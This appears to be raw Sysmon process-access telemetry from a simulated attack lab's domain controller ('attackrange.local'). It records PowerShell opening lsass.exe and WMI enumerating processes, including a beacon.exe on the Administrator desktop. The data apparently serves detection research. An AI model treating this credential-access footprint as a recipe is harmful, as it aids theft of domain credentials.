16:52:51.774{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.773{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.772{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.771{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.769{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.767{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.767{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.766{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.764{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.764{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.763{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.762{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.747{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 